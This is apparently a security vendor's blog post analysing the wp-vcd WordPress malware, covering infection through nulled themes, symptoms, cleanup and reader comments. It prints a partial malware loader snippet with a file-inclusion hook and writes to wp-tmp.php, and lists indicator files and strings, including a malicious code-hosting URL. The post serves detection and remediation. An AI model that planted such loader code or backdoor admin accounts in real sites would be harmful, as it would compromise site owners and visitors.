What is WordPress wp-vcd Malware?

We recently saw a new type of malware infecting WordPress websites by leveraging loopholes in outdated plugins and themes. The wp-vcd malware creates backdoors in your website by adding hidden WordPress admin users. Further, some variants of the malicious codes have been seen to modify core WordPress files and also add new files in the /wp-includes directory.

  1. The wp-vcd malware creates Spam URLs on the website (also referred to as URL Injection)
  2. The malware creates a backdoor which allows hackers to have access to your website for extended periods
  3. Hackers are able to exploit vulnerabilities in WordPress plugins & themes to upload the wp-vcd malware on vulnerable sites.

Such a hack could have been avoided with a Web Application Firewall (WAF) and regular malware scanning. It is also essential to check modification of WordPress core files, plugins & themes.

Reasons for wp-vcd Malware Hack.

  1. The most common reason of the hack is the use of a nulled theme – the wp-vcd malware in many cases comes pre-installed with every downloaded theme from nulled theme websites
  2. If you are using outdated WordPress plugins & themes for your site.
  3. No Web Application Firewall (WAF) installed to block hacking attempts made by hackers

WordPress Website infected with a malware? Drop us a message on the chat widget, and we’d be happy to help you fix it.

What are the symptoms of wp-vcd malware?

  1. A New WordPress Administrator user has been added without your knowledge
  2. Your hosting provider suspended your WordPress account because of wp-vcd malware attack to protect other websites
  3. SEO spam such as Japanese search results or Pharma attack in Google Search Results. Learn more about WordPress spam search results and how to fix them. Below is the screenshot of Google spam search results:
    wp-vcd hacked results in Google
  4. Unknown JavaScript code in the source of your website
  5. Pages on your website are being redirected to shady websites
  6. Unknown PHP files in wp-includes folder which are not there in the WordPress GitHub repository
  7. There are PHP files in the wp-content/uploads directory and it’s sub-directories

Astra Firewall protects your website from all such malware and assures 24×7 security of your website.

Analysis of what the wp-vcd malware does?

In the functions.php file within your theme, you would see some code similar to this:

<?php if (file_exists(dirname(__FILE__) . '/class.theme-modules.php')) include_once(dirname(__FILE__) . '/class.theme-modules.php'); ?>

This code includes the class.theme-modules.php file which actually installs the wp-vcd malware into the other themes installed (enabled/disabled) and creates all the other malicious files.

Code snippet of the malware code:

<?php
 
//install_code1
error_reporting(0);
ini_set('display_errors', 0);
DEFINE('MAX_LEVEL', 2); 
DEFINE('MAX_ITERATION', 50); 
DEFINE('P', $_SERVER['DOCUMENT_ROOT']);

$GLOBALS['WP_CD_CODE'] = 'PD9waHANCmVycm9y...(base64-encoded string of PHP code)
...

if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
 @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
 if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
 @file_put_contents('wp-tmp.php', $tmpcontent);
 }
 }

As we had discussed in the earlier section, this code would create a new admin user with a name similar to 100010010. The objective of this backdoor admin account is to make sure that the hacker is able to access the website even if you delete the malicious code – basically, so that the attackers could attack your website at a later point of time.

How to clean the wp-vcd malware infection

Search for occurrences of the below files/strings on your server and examine their contents. Run a diff check of the file contents with corresponding files in the WordPress core GitHub repository or theme/plugin directory. You can use either of the approaches (or both) using SSH or using your IDE.

Approach 1 – Search for files on the server that are usually infected with the wp-vcd hack

  1. wp-includes/wp-vcd.php
  2. wp-includes/wp-tmp.php
  3. wp-content/themes/*/functions.php (all themes installed on the server whether active or not)
  4. class.theme-modules.php
  5. class.wp.php
  6. admin.txt
  7. codexc.txt
  8. code1.php
  9. class.theme-modules.php (inside the theme folder)

Approach 2 – Search for string patterns that are found in infected malware files

  1. tmpcontentx
  2. function wp_temp_setupx
  3. wp-tmp.php
  4. derna.top/code.php
  5. stripos($tmpcontent, $wp_auth_key)

How to protect WordPress and stay secure from the backdoor

  1. Create a simple security strategy:
    1. Clean – Make sure your website files and database is 100% clean and malware free
    2. Protect – Install a Web Application Firewall (WAF) to block re-infection attempts
    3. Monitor – Run regular malware scans to check if files/database have tampered
  2. Delete unused WordPress themes (even if disabled)
  3. Completely avoid Nulled themes on your website
  4. Update WordPress core, Plugins and themes

Cleaning infected websites with such malware is not always easy. Because, once they are activated on a website, they tend to infect other areas of the website too by installing the different type of malware codes. Further, this particular malware also creates a backdoor which allows the bad guys to get complete control of your site. Hence, it is important to create an effective security strategy which does a thorough analysis of your website. And afterward completely removes the hack from your website.

If you think you are hacked with this malware, do let us know. We are happy to help 🙂 Click here for immediate help.

Astra

At Astra, we have a team of security experts who daily resolve dozens of web security issues. Our web application firewall ASTRA protects your website 24×7 from XSS, SQL injection, bad bots, malware and 80+ other threats.

Web Application Firewall Magento, Opencart Prestashop

Take an Astra Demo now

Waiting to Get Hacked?

Get security tips & latest vulnerability fixes right in your inbox:

About The Author

Ananda Krishna

Ananda is a security researcher at Astra.

4 Comments

  1. Thank you for this informative read, I have shared iit on Twitter.

  2. thank you very much for the detailed explanation.

    I have a question,

    I have cleaned the functions.php file from the snippet and deleted the wp-vcd.php file.
    search through the SQL for all the string patterns and found nothing.

    does it mean I’m safe?

  3. That’s a really good point this Article is very helpful and informative. Thanks for sharing

  4. Thank you for this useful Article, That help me a lot

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Close